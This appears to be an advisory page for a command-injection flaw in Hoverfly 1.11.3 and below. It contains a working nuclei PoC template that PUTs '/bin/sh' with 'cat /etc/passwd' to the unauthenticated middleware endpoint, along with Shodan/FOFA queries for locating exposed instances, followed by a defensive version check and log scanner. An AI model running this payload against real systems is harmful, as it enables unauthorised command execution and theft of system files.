Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
PoC code [public]
id: CVE-2025-54123

info:
  name: Hoverfly <= 1.11.3 - Remote Code Execution
  author: nukunga[seonghyeonJeon]
  severity: critical
  description: |
    Hoverfly versions 1.11.3 and below are vulnerable to remote code execution (RCE) via command injection in the middleware API endpoint (/api/v2/hoverfly/middleware). Insufficient validation of the 'binary' and 'script' parameters allows an unauthenticated attacker to execute arbitrary commands on the host system.
  reference:
    - https://github.com/advisories/GHSA-r4h8-hfp2-ggmf
    - https://github.com/SpectoLabs/hoverfly/security/advisories/GHSA-r4h8-hfp2-ggmf
  metadata:
    verified: true
    max-requests: 1
    shodan-query:
      - http.favicon.hash:1357234275
      - title:"Hoverfly Dashboard"
    fofa-query:
      - icon_hash="1357234275"
      - title="Hoverfly Dashboard"
  tags: cve,cve2025,hoverfly,rce,intrusive,vuln,vkev

http:
  - raw:
      - |
        PUT /api/v2/hoverfly/middleware HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "binary": "/bin/sh",
          "script": "cat /etc/passwd"
        }

    matchers:
      - type: dsl
        dsl:
          - "status_code == 422"
          - "regex('root:x:0:0', body)"
          - "contains_all(body, 'STDOUT:','hoverfly')"
        condition: and
# digest: 490a0046304402207aea6e1391e0e30202a15308b6de7eb94bdf6f222d448496a07babfdb8393270022055cc6cc38ef502848f85f7967f144728eda8c8cf8bb388c390c3151728c3e995:922c64590222798bb761d5b6d8e72950
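The template above tells a defender two things worth turning into checks: the affected version range (1.11.3 and below) and the request shape that is abused (a PUT to /api/v2/hoverfly/middleware, for which the matcher expects a 422 response carrying command output). The following is an added example, not code from the advisory, from Hoverfly or from the nuclei template's author. It parses a Hoverfly version string to decide whether an instance falls in the advisory's range, and scans reverse-proxy access-log lines in Combined Log Format for writes to the middleware endpoint. The log format, the field names and the sample lines are assumptions constructed for the example; Hoverfly itself does not necessarily log in this format.

```python
"""Defensive checks for CVE-2025-54123 in Hoverfly (added example).

1. is_vulnerable_version(): True for Hoverfly 1.11.3 and below, the range
   stated in the advisory.
2. find_middleware_writes(): scans access-log lines (Combined Log Format,
   assumed to come from a reverse proxy in front of Hoverfly) and flags PUT
   requests to /api/v2/hoverfly/middleware. A 422 response is what the PoC
   template's matcher expects when the injected script ran, so those hits
   are ranked "high"; any other PUT to the endpoint is "medium".
"""
import re
from dataclasses import dataclass
from typing import List, Tuple

MIDDLEWARE_PATH = "/api/v2/hoverfly/middleware"   # endpoint named in the advisory
MAX_VULNERABLE = (1, 11, 3)                       # "1.11.3 and below"

# Combined Log Format: ip ident user [ts] "METHOD path proto" status size ...
_LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)


def parse_version(version: str) -> Tuple[int, int, int]:
    """Turn 'v1.11.3' or '1.11.3' into an integer tuple for comparison."""
    m = re.match(r'^v?(\d+)\.(\d+)\.(\d+)', version.strip())
    if not m:
        raise ValueError(f"unrecognised Hoverfly version string: {version!r}")
    return tuple(int(x) for x in m.groups())  # type: ignore[return-value]


def is_vulnerable_version(version: str) -> bool:
    """True when the version is within the advisory's affected range."""
    return parse_version(version) <= MAX_VULNERABLE


@dataclass
class Hit:
    ip: str
    timestamp: str
    status: int
    severity: str
    line: str


def find_middleware_writes(lines: List[str]) -> List[Hit]:
    """Return every PUT to the middleware endpoint found in the log lines."""
    hits: List[Hit] = []
    for line in lines:
        m = _LOG_RE.match(line)
        if not m:
            continue  # not a CLF line; skip rather than guess
        path = m.group("path").split("?", 1)[0]
        if path != MIDDLEWARE_PATH or m.group("method") != "PUT":
            continue
        status = int(m.group("status"))
        # 422 is the status the PoC matcher keys on; treat it as the strongest signal.
        severity = "high" if status == 422 else "medium"
        hits.append(Hit(m.group("ip"), m.group("ts"), status, severity, line))
    return hits


# Constructed sample log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '10.0.0.5 - - [12/Aug/2025:10:01:02 +0000] "GET /api/v2/hoverfly HTTP/1.1" 200 312 "-" "curl/8.0"',
    '203.0.113.7 - - [12/Aug/2025:10:01:05 +0000] "PUT /api/v2/hoverfly/middleware HTTP/1.1" 422 188 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [12/Aug/2025:10:01:09 +0000] "PUT /api/v2/hoverfly/middleware HTTP/1.1" 200 95 "-" "curl/8.0"',
    '198.51.100.2 - - [12/Aug/2025:10:02:11 +0000] "GET /dashboard HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for v in ("1.11.3", "v1.11.2", "1.12.0"):
        print(f"{v}: {'affected' if is_vulnerable_version(v) else 'not in affected range'}")
    for hit in find_middleware_writes(SAMPLE_LOG):
        print(f"[{hit.severity}] {hit.ip} {hit.timestamp} status={hit.status}")
```

The version check reports only membership in the advisory's stated range; it does not claim which release fixed the issue, since the page does not say. Because the endpoint is reachable without authentication according to the advisory, any PUT to it from an address outside the set of hosts that legitimately configure the simulator is worth reviewing, whatever the status code.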